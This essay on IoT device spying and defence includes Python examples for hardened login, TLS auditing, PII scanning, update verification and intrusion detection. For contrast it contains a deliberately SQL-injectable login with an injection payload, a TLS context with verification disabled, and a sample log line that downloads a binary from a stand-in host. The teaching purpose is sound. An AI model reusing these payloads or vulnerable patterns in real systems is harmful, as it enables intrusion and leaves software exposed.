In today’s world we owe a great deal to technology and the comfort it grants us. We can perform in minutes searches that once took a warehouse of machines to compute. We can view far-reaching landscapes in full detail without ever leaving the comfort of our own home. Everything from finance to fitness is literally at our fingertips every day, due in part to the miniature supercomputers we carry in our pockets. Who would have thought that something so small could have so much impact on our society? That impact, however, has not always been positive, and in some cases it has been intrusive. Our devices are sometimes used by nefarious actors whose intent is to intrude on our daily lives, turning our beloved gadgets into instruments of espionage. Device spying is becoming all too common and the potential damage is vast. We must start protecting our devices as we would any other valuable. It was once said that the best offense is a good defense, and we will explore that here. We will discuss the terms, threats and vulnerabilities associated with device spying, and then methods of device protection and incident response.
To understand device spying we must first know how it finds its way onto our devices. The root of the problem is malware: software written with malicious intent, designed to act against the user and to affect networks, servers and computers. Malware goes by many names, such as trojan horse, ransomware, adware, scareware and, of course, spyware. Corporations, governments and financial institutions are frequent targets. One common goal against such targets is a denial-of-service (DoS) attack, whose purpose is to temporarily or indefinitely disrupt the services of a host connected to the internet. Aside from government agencies and corporations, malware can be used to target individuals. It can be used to steal personally identifiable information (PII), which is any data that can be used to identify a specific person. Examples of PII include social security numbers, birth dates, place of birth, biometrics, medical records, financial records and IP addresses. If stolen by an intruder, this data can have damaging repercussions.
Once installed on a system, malware can use several methods to capture your data. One method used to quietly spy on daily activity is spyware, whose purpose is to capture data without the knowledge or consent of the user. An unauthorized third party can record a user’s text messages, email, camera, conversations, location, passwords, financial data, PII and internet habits. Spyware is installed in various ways: users can download it by accident, or an attacker can trick the user into installing it. Another installation method is the “drive-by download”, where the user visits an infected website; no action beyond visiting the site is required, and the download starts soon after the page loads. There are also commercial versions of spyware installed to monitor corporate devices. Users should be aware that several types of spyware exist, including adware, rootkits, keyloggers, trojans, tracking cookies, digital rights management components, system monitors and web beacons. Keyloggers deserve special mention: they capture keystrokes and send them back to the attacker, handing over passwords and with them unauthorized access. Spyware has also been known to redirect users to suspicious websites where further data breaches can take place, and to make unauthorized changes to browser, software and computer settings that affect the user.
You may now wonder who operates in the darkest places of the web, preying on your devices. These are cyber criminals, and they pose a great threat to sovereign governments, corporations and individual users alike. The severity of the threat has reached center stage at the highest levels of the U.S. intelligence community. U.S. Director of National Intelligence Dan Coats said, “The potential for surprise in the cyber realm will increase in the next year and beyond as billions more digital devices are connected with relatively little built-in security and both nation states and malign actors become more emboldened and better equipped in the use of increasingly widespread cyber toolkits.” These actors, whether criminal groups or states, tend to operate in various roles within organizations, such as:
• Leaders: Typically not tech savvy, but they direct the cybercriminal organization.
• Programmers: Write the code and tools that cybercriminals use.
• Hackers: Gain unauthorized access to networks and systems.
• Fraudsters: Create spam and phishing campaigns.
• System hosts and providers: Host sites and servers that hold illegal content.
• IT experts: Maintain a cybercriminal organization’s IT infrastructure, such as servers, encryption technologies and databases.
• Money mules: Control and manage wire transfers of stolen funds.
• Distributors: Sell stolen data acquired from other cybercriminals on the black market.
• Cashiers: Provide account names to cybercriminals and control drop accounts.
• Tellers: Transfer and launder illicit money via digital and foreign-exchange methods.
The list above is only a glimpse into the complex world of cybercrime. In some cases these actors are sponsored by nation states, which fund them to perform more complex attacks, typically against other governments but also against corporations. Examples of state-sponsored cyber-attacks include operations against Ukraine and Saudi Arabia that targeted commercial networks, government institutions and critical infrastructure; North Korea, a well-known perpetrator of state-sponsored attacks, maintains an active botnet for DDoS attacks; and US shipping has been disrupted by a global malware outbreak. As you can see, cyber criminals have a reach that spans the globe.
As mentioned, nation states pose a great threat, and our household devices offer them a gateway into our lives. Former US Director of National Intelligence James Clapper, in a statement to Congress regarding threats to the US, said, “In the future, intelligence services might use the internet of things for identification, surveillance, monitoring, location tracking, and targeting for recruitment, or to gain access to networks or user credentials.” The “internet of things” (IoT) generally covers smart devices and internet-connected appliances such as kitchen equipment and thermostats, including those that carry RFID (radio-frequency identification) chips. Hackers have used such devices as gateways into networks. The former director’s statement should be alarming because it is a direct warning of things to come. Let us now explore the threats, risks and vulnerabilities associated with device spying and how they affect IoT devices.
To understand the potential negative impact of IoT device spying we must be familiar with the terms threat, risk and vulnerability. A threat is a circumstance or event that can compromise the confidentiality, integrity or availability of data or a system. A vulnerability is a flaw or weakness in software, hardware or a process that could result in a security breach. Risk is the likelihood that a threat will exploit a vulnerability, weighed against the resulting impact. There are many threats, risks and vulnerabilities associated with targeting IoT devices for spying. Below we explore ten key areas that have been noted as having a negative impact on users.
Insecure Web Interfaces
The first threat is the insecure web interface built into many devices. These interfaces, unlike their more robust laptop or desktop cousins, are often written with little hardening and can allow attackers to gain unauthorized access. Associated vulnerabilities range from account enumeration and SQL injection to weak default credentials, cross-site scripting and weak account-lockout settings.
Insufficient Authentication/Authorization
Another threat is insufficient authentication or authorization: ineffective methods that fail to properly authenticate the device user at the interface, or that grant the person accessing the device a higher level of access than should be allowed. Vulnerabilities associated with this threat include poorly protected credentials, insecure password recovery, privilege escalation, lack of role-based access control and lack of password complexity requirements.
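The following is an added example, not code from the original text or from any real device, showing three of the web-interface weaknesses above (account enumeration, SQL injection and missing lockout) in a login handler and the hardened form beside it. It uses an in-memory SQLite database with a constructed “admin” account; the table names, the PBKDF2 work factor and the lockout threshold are assumptions for the illustration.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed example data: one device account. Not real credentials.
ITERATIONS = 50_000     # PBKDF2 work factor; raise it on hardware that can afford it
MAX_FAILURES = 5        # lockout threshold (a production lockout should also expire over time)


def make_db():
    """Create an in-memory database with a legacy plaintext table and a hardened table."""
    db = sqlite3.connect(":memory:")
    # The insecure firmware's table: plaintext passwords, no failure counter.
    db.execute("CREATE TABLE legacy_users (name TEXT PRIMARY KEY, password TEXT)")
    db.execute("INSERT INTO legacy_users VALUES (?, ?)", ("admin", "correct horse"))
    # The hardened table: salted PBKDF2 hash and a failure counter for lockout.
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB, failures INTEGER)")
    salt = os.urandom(16)
    pw_hash = hashlib.pbkdf2_hmac("sha256", b"correct horse", salt, ITERATIONS)
    db.execute("INSERT INTO users VALUES (?, ?, ?, 0)", ("admin", salt, pw_hash))
    return db


def vulnerable_login(db, name, password):
    """Login as commonly found in weak device web interfaces (do not copy)."""
    # Flaw 1: a distinct message for unknown users lets an attacker enumerate accounts.
    exists = db.execute(f"SELECT 1 FROM legacy_users WHERE name = '{name}'").fetchone()
    if exists is None:
        return (False, "no such user")
    # Flaw 2: SQL built by string formatting, so the password field is injectable.
    # Flaw 3: no lockout, so the check can be brute-forced indefinitely.
    row = db.execute(
        f"SELECT 1 FROM legacy_users WHERE name = '{name}' AND password = '{password}'"
    ).fetchone()
    if row is None:
        return (False, "wrong password")
    return (True, "ok")


def hardened_login(db, name, password):
    """Parameterized query, constant error message, hashed passwords, lockout counter."""
    row = db.execute(
        "SELECT salt, pw_hash, failures FROM users WHERE name = ?", (name,)
    ).fetchone()
    if row is None:
        # Spend the same hashing cost for unknown users so timing does not reveal existence.
        hashlib.pbkdf2_hmac("sha256", password.encode(), b"\x00" * 16, ITERATIONS)
        return (False, "invalid credentials")
    salt, pw_hash, failures = row
    if failures >= MAX_FAILURES:
        return (False, "invalid credentials")      # locked: same message as any other failure
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    if not hmac.compare_digest(candidate, pw_hash):
        db.execute("UPDATE users SET failures = failures + 1 WHERE name = ?", (name,))
        return (False, "invalid credentials")
    db.execute("UPDATE users SET failures = 0 WHERE name = ?", (name,))
    return (True, "ok")


if __name__ == "__main__":
    db = make_db()
    injected = "x' OR '1'='1"
    print("vulnerable, injected password:", vulnerable_login(db, "admin", injected))
    print("hardened, injected password:  ", hardened_login(db, "admin", injected))
    for _ in range(MAX_FAILURES):
        hardened_login(db, "admin", "guess")
    print("hardened, correct password after lockout:", hardened_login(db, "admin", "correct horse"))
```

The injected password turns the vulnerable query into `... AND password = 'x' OR '1'='1'`, which is always true; the parameterized version hashes the same string as an ordinary wrong password. The hardened handler also returns one message for unknown user, wrong password and locked account, which closes the enumeration oracle.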
Insecure Network Services
This threat concerns the network services (open ports) through which the IoT device is reached. Here an attacker can gain unauthorized access to the device and exploit sensitive data. The main vulnerabilities, such as unnecessary or unpatched services exposed to the network, can result in attacks such as buffer overflows, denial of service (DoS), or DoS triggered by fuzzing the device’s network services.
Lack of Transport Encryption
A lack of encryption during data exchange with the IoT device gives an attacker the opportunity to sniff the traffic. Packet sniffing (data capture) can then be used to read credentials and data and to compromise the device. Vulnerabilities behind this threat are misconfigured or poorly implemented SSL/TLS (for example, accepting any certificate or allowing obsolete protocol versions) and services that run unencrypted over the internet or the local network.
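As an added example (not from the original text), the snippet below contrasts a TLS client configuration of the kind often found in device firmware, which accepts any certificate and any protocol version, with a hardened one, and includes a small audit function that reports the weaknesses. It uses only Python’s standard `ssl` module and builds the contexts without connecting anywhere, so it runs offline; the function names are my own.

```python
import ssl


def weak_client_context():
    """Settings frequently found in device firmware: verification off, any TLS version."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False                   # must be cleared before verify_mode is lowered
    ctx.verify_mode = ssl.CERT_NONE              # accepts any certificate, so any man-in-the-middle
    ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED   # whatever OpenSSL still allows
    return ctx


def hardened_client_context():
    """Verify the server against the system trust store and require TLS 1.2 or newer."""
    ctx = ssl.create_default_context()           # CERT_REQUIRED and check_hostname already set
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def audit_tls_context(ctx):
    """Return the list of weaknesses in a client SSLContext; an empty list means it passes."""
    findings = []
    if ctx.verify_mode == ssl.CERT_NONE:
        findings.append("certificate verification disabled (verify_mode=CERT_NONE)")
    if not ctx.check_hostname:
        findings.append("hostname check disabled (check_hostname=False)")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("protocol versions below TLS 1.2 allowed")
    return findings


if __name__ == "__main__":
    print("weak:    ", audit_tls_context(weak_client_context()))
    print("hardened:", audit_tls_context(hardened_client_context()))
```

The hardened context is what the device would pass to `ctx.wrap_socket(sock, server_hostname=...)` when talking to its cloud service; with the weak context the same call succeeds against any impostor on the path, which is exactly the sniffing scenario described above.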
Invasion of privacy
This concerns the capture of personal data (PII) and the lack of protection for that information. As mentioned, theft of PII or any sensitive data can be damaging, and identity theft and fraud are direct consequences of privacy invasion through device spying. Fortunately, it can be detected by reviewing what data is captured and transmitted as the user operates the device, and automated toolkits exist that detect patterns indicating that PII is being collected. Vulnerabilities that lead to this concern are mainly the unauthorized collection of PII, a lack of awareness of how to protect PII, and poorly secured data.
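The pattern-based detection mentioned above, as an added example that is not part of the original text: a scanner that inspects a device’s outbound payloads for PII-shaped fields (email addresses, US social security numbers and payment card numbers, the last validated with the Luhn checksum to avoid flagging random digit runs). The two payloads are constructed samples from a hypothetical thermostat, not captured traffic.

```python
import re

# Constructed outbound messages from a hypothetical smart thermostat (sample data, not captured traffic).
BENIGN_PAYLOAD = '{"device":"thermo-01","temp_c":21.5,"setpoint":20.0,"uptime_s":86400}'
SUSPECT_PAYLOAD = ('{"device":"thermo-01","owner":"jane.doe@example.com",'
                   '"ssn":"123-45-6789","card":"4111 1111 1111 1111"}')

PATTERNS = {
    "email": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.-]+\b"),
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "card": re.compile(r"\b(?:\d[ -]?){13,19}\b"),   # digits with optional spaces/dashes
}


def luhn_ok(digits):
    """Luhn checksum: true for well-formed payment card numbers, false for most random digit runs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:                  # double every second digit from the right
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def scan_payload(text):
    """Return (kind, value) pairs for PII-looking fields found in an outbound payload."""
    hits = []
    for kind, pattern in PATTERNS.items():
        for match in pattern.finditer(text):
            value = match.group()
            if kind == "card":
                digits = re.sub(r"[ -]", "", value)
                if not (13 <= len(digits) <= 19 and luhn_ok(digits)):
                    continue            # digit run that is not a plausible card number
            hits.append((kind, value))
    return hits


if __name__ == "__main__":
    for label, payload in (("benign", BENIGN_PAYLOAD), ("suspect", SUSPECT_PAYLOAD)):
        print(label, "->", scan_payload(payload))
```

In practice this check sits where the device’s traffic can be seen in the clear (a home gateway, a test harness, or the device firmware itself during review); it only tells you that PII is leaving the device, not whether the recipient was authorized to receive it, so findings still need a human to compare against what the device is supposed to send.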
Insecure Cloud Interface
Here the cloud interface used to interact with the IoT device has poor authentication controls, or the data travels unencrypted, giving a cybercriminal an opportunity to access the device or its data. Specific vulnerabilities behind this threat are the absence of account lockout, credentials exposed on the network, and account enumeration.
Insecure Mobile Interface
Like the insecure cloud interface, this threat concerns weak authentication and unencrypted data in the mobile application that controls the device, which attackers can exploit over insecure network connections. Once again, an insecure device interface leaves you vulnerable; the underlying issues mirror those of insecure cloud interfaces.
Insufficient Security Configurability
Insufficient security configurability arises when users have limited access to security controls. Typically the device’s web interface offers no way to create permissions or roles, so the device may be susceptible to attack and unauthorized access. Associated vulnerabilities are the absence of security logging, no security monitoring, a lack of password options (such as complexity requirements) and the lack of a granular permissions model.
Insecure Software/Firmware
Keeping systems updated is also a major key to defending against outside threats; a device that cannot be updated may be the greatest flaw in your network security. All devices should be able to update when vulnerabilities are found. Remember, too, that software and firmware updates can themselves be insecure if the download is not protected and the update is not verified before installation, and that software and firmware can contain hardcoded sensitive data such as credentials, which can be extracted and exploited. Any device on your network that cannot be updated will remain vulnerable. Vulnerabilities in this area include unencrypted update files, no update functionality, updates not verified before installation, and updates fetched without encryption.
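As an added example (my own, not from the original text or any vendor’s update system), the code below shows the verification a device should perform before flashing an update: check the manifest signature, refuse rollback to an older version, and check that the image matches the hash in the manifest. To stay within the standard library it uses an HMAC with a shared key as a stand-in for the vendor’s asymmetric signature (a real device would hold only a vendor public key and verify, for example, an Ed25519 signature); the key, manifest format and version scheme are assumptions.

```python
import hashlib
import hmac
import json

# Hypothetical key shared by the vendor build system and the device (example only).
# In production this is replaced by a vendor public key and an asymmetric signature.
VENDOR_KEY = b"example-vendor-key-do-not-use"


def canonical(manifest):
    """Stable byte encoding so signer and verifier hash exactly the same bytes."""
    return json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()


def sign_update(image, version, key=VENDOR_KEY):
    """Vendor side: bind the version and image hash into a manifest, then sign the manifest."""
    manifest = {"version": version, "sha256": hashlib.sha256(image).hexdigest()}
    signature = hmac.new(key, canonical(manifest), hashlib.sha256).hexdigest()
    return manifest, signature


def verify_update(manifest, signature, image, installed_version, key=VENDOR_KEY):
    """Device side: reject unsigned, tampered or rolled-back images before flashing."""
    expected = hmac.new(key, canonical(manifest), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, signature):
        return (False, "manifest signature invalid")
    if manifest["version"] <= installed_version:
        return (False, "rollback to older or same version refused")
    if hashlib.sha256(image).hexdigest() != manifest["sha256"]:
        return (False, "image hash does not match manifest")
    return (True, "update accepted")


if __name__ == "__main__":
    image = b"firmware v2 (constructed bytes)"
    manifest, sig = sign_update(image, version=2)
    print("genuine update:   ", verify_update(manifest, sig, image, installed_version=1))
    print("tampered image:   ", verify_update(manifest, sig, image + b"\x00", installed_version=1))
    print("edited manifest:  ", verify_update(dict(manifest, version=3), sig, image, installed_version=1))
    print("rollback attempt: ", verify_update(manifest, sig, image, installed_version=2))
```

The order of the checks matters: the signature is verified first so that nothing in an unauthenticated manifest (including the version number) influences later decisions, and the image hash is compared only after the manifest is trusted. Fetching the update over TLS protects the download in transit, but it is the signature check that stops a compromised mirror or a captured device from being handed a malicious image.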
Poor Physical Security
It goes without saying that users must protect their IoT devices, whether at home or in public. Weak physical security can also give a cybercriminal access to your devices: an attacker who can take a device apart may gain access to its storage or other data. USB and other external ports count as well, since an attached USB device can be used to load a malicious configuration. The vulnerabilities behind this threat include access to the software via a USB port and unauthorized removal of the storage drive.
After exploring just a small array of the threats, risks and vulnerabilities associated with IoT devices, the question becomes how we can defend against them. At the bare minimum, basic awareness is enough to start boosting our defenses. Awareness alone, however, will not properly protect our networks and devices. Instead we should look at a concept called defense in depth, which refers to layered security. Layered security typically involves deploying a VPN (an encrypted tunnel), firewalls and an IDS to protect a network.
A virtual private network (VPN) helps protect your traffic with encryption. The connection to your VPN’s server uses technologies such as IP security (IPsec), Layer 2 Tunneling Protocol over IPsec (L2TP/IPsec), or SSL/TLS to create an encrypted tunnel between your device and the VPN server. A VPN also takes your internet service provider (ISP) out of the loop on your browsing habits, because the ISP sees only connections to the VPN server; note that the VPN provider is now in that position instead, so choose one you trust. When you browse through this tunnel it becomes more difficult for anyone on the path to eavesdrop.
A firewall is a software program, a piece of hardware, or both, that blocks intruders from entering and using your network or computer. Its primary purpose is to decide, based on rules configured by the firewall’s administrator, whether a request from one device to initiate a connection to another should be permitted. A firewall blocks communication to and from sources you do not permit. There are two broad types: software-based personal firewalls, which are typically extensions of the workstation’s operating system, and network-based firewalls, which are hardware appliances that pass traffic in the same way routers and switches do.
An Intrusion Detection System (IDS) is a network security technology built to detect attacks against a network, application or computer. Intrusion detection systems are passive: they collect traffic information from the network or host and use it to detect attacks as they occur. They are classified as either misuse-detection (signature-based) or anomaly-detection based. Misuse-detection IDSs can only detect known attacks, whereas anomaly-detection IDSs can also detect new attacks using heuristic methods. Because an IDS only needs to observe traffic, it is deployed out-of-band (for example on a mirror or SPAN port) rather than inline, meaning it does not sit between the sender and receiver of data. Ultimately the IDS only monitors traffic and sends alerts about it to an administrator; it cannot by itself prevent a detected breach and requires constant vigilance from the administrator. Cyber criminals have been known to target the IDS once inside a network, typically by turning it off so that it can no longer perform its detection duties.
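To make the misuse-versus-anomaly distinction concrete, here is an added example (not from the original text, and not any real IDS product) that runs both kinds of detector over constructed connection-log lines from a small IoT network. The log format, the IP addresses (private and documentation ranges) and the payload strings are all made up for the illustration; the “busybox” download is included because it is a typical pattern for IoT botnet installers, and the probe on port 2323 stands in for a novel attack with no signature yet.

```python
import re
from collections import Counter

LOG_RE = re.compile(r"src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+) payload=(?P<payload>.*)")


def _line(src, dport, payload=""):
    """Build one constructed log line (sample data, not captured traffic)."""
    return f"2024-01-01T00:00:00 src={src} dst=10.0.0.1 dport={dport} payload={payload}"


# A clean window used to learn what "normal" looks like: two devices talking HTTPS and MQTT/TLS.
BASELINE_LINES = [
    _line("10.0.0.5", 443, "GET /status"), _line("10.0.0.5", 8883, "MQTT CONNECT"),
    _line("10.0.0.5", 443, "GET /status"), _line("10.0.0.6", 443, "POST /telemetry"),
    _line("10.0.0.6", 8883, "MQTT PUBLISH"),
]

# A later window containing a flood, a known botnet pattern and a novel probe.
ATTACK_LINES = (
    [_line("10.0.0.99", 443, "GET /status") for _ in range(20)]                 # hammering the device
    + [_line("10.0.0.99", 23, "wget http://198.51.100.7/busybox -O /tmp/b")]    # known signature
    + [_line("10.0.0.77", 2323, "enable")]                                      # novel: no signature
)

# Misuse (signature) rules: each is a name and a predicate over a parsed event.
MISUSE_RULES = [
    ("telnet-to-device", lambda e: e["dport"] == 23),
    ("sqli-in-payload", lambda e: "' or '1'='1" in e["payload"].lower()),
    ("busybox-download", lambda e: "wget" in e["payload"] and "busybox" in e["payload"]),
]


def parse(line):
    """Parse one log line into a dict, or None if it does not match the format."""
    match = LOG_RE.search(line)
    if not match:
        return None
    event = match.groupdict()
    event["dport"] = int(event["dport"])
    return event


def misuse_detect(lines):
    """Signature-based detection: fires only on patterns listed in MISUSE_RULES."""
    alerts = []
    for event in filter(None, map(parse, lines)):
        for name, matches in MISUSE_RULES:
            if matches(event):
                alerts.append((name, event["src"]))
    return alerts


class AnomalyDetector:
    """Heuristic detection: learns the normal ports and per-source rate from a clean window."""

    def __init__(self, baseline_lines, factor=3):
        events = list(filter(None, map(parse, baseline_lines)))
        self.known_ports = {e["dport"] for e in events}
        # Flag any source that exceeds `factor` times the busiest baseline source.
        self.rate_limit = factor * max(Counter(e["src"] for e in events).values())

    def detect(self, lines):
        events = list(filter(None, map(parse, lines)))
        alerts = [("unseen-port", e["src"]) for e in events if e["dport"] not in self.known_ports]
        for src, count in Counter(e["src"] for e in events).items():
            if count > self.rate_limit:
                alerts.append(("rate-spike", src))
        return alerts


if __name__ == "__main__":
    print("misuse alerts: ", misuse_detect(ATTACK_LINES))
    print("anomaly alerts:", AnomalyDetector(BASELINE_LINES).detect(ATTACK_LINES))
```

The signature detector names the telnet and busybox activity precisely but says nothing about the probe from 10.0.0.77; the anomaly detector catches that probe (unseen port) and the flood (rate spike) but can only say “unusual”, not what the attack is. Real deployments run both, and the anomaly baseline must be learned from a window known to be clean, otherwise the attacker’s traffic becomes part of “normal”.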
To implement layered security effectively we need to know the methods attackers use, so that we can build the defenses accordingly. Most hackers do a great deal of intelligence gathering once they have chosen a target. The easiest source of information is a tap on the network, but suppose they cannot get that kind of access. Over the internet they can harvest email addresses from company sites, read people’s signature lines, pose as prospective partners, and so on. A firewall and an IDS limit what they can reach inside the network through filtering and detection. Most people keep factory settings and accept updates, while the more informed consult sites that report what attackers are using to exploit systems and hardware. To go a step further, when people work from home and need to access files at work, they use a VPN, which provides a secure tunnel between home and work so that everything traversing it is encrypted. (Diagram: layered security for a network.) Stronger encryption is far harder to break. With all of these combined, you have a basic secure network.
Finally, in the event of a cyber-attack or data breach, knowing how to respond is critical. Today many companies have adopted some form of incident response (IR) plan: a set of procedures detailing how to respond properly to a known intrusion. Many of these plans involve alerting a computer security incident response team (CSIRT), usually made up of IT, legal, human resources and public relations staff. The team and plan vary in approach, but the goal is the same: prevent further loss. Below we explore the execution of an incident response when an IoT device is compromised.
In a device spying scenario where an IoT device has been compromised, several steps should be taken to prevent further loss or damage to other systems. The first step is to validate the breach: verify the incident by reviewing all available information. Typically a review of logs will confirm what sensitive information, if any, has been exposed. Next, carefully manage the evidence and document everything related to the investigation. Any staff interviewed and any materials gathered must be handled with care so that they support the mitigation effort, and it may be best to seek legal counsel on approved methods for handling digital evidence. Assemble the computer security incident response team (CSIRT) to begin investigating; the team continues to monitor the incident and provides status updates. Consulting with the team to determine the full scope of damage may lead to a request for outside assistance such as law enforcement; where additional resources are needed, obtain approval from senior leadership and legal. Next, identify and secure all data, machines, systems and devices that have been compromised. At this stage the priority is containment: change all passwords and encryption keys immediately, and scrub the network to remove any malicious code. Then inform all owners of critical and sensitive data that a breach has occurred. Senior leadership, legal and the public relations team should draft a notification that clearly states the issue and the impact of the breach.
Any individuals directly impacted by the breach should also be notified promptly, within the timeframe required by federal, state and local law. Finally, conduct lessons-learned sessions to develop improvements: all teams should meet to discuss how to prevent a future intrusion and reflect on the events that led to the initial breach.
In conclusion, we face an ever-growing array of threats, whether from lone hackers or foreign powers. As severe as these threats are, the best weapon against them is awareness. If the common user is more aware of the potential dangers in their mundane IoT devices, incidents will be reduced. In the days ahead, preparation will be key to ensuring that cyber criminals do not prey on our sensitive information. As it was once said, “the best offense is a good defense”.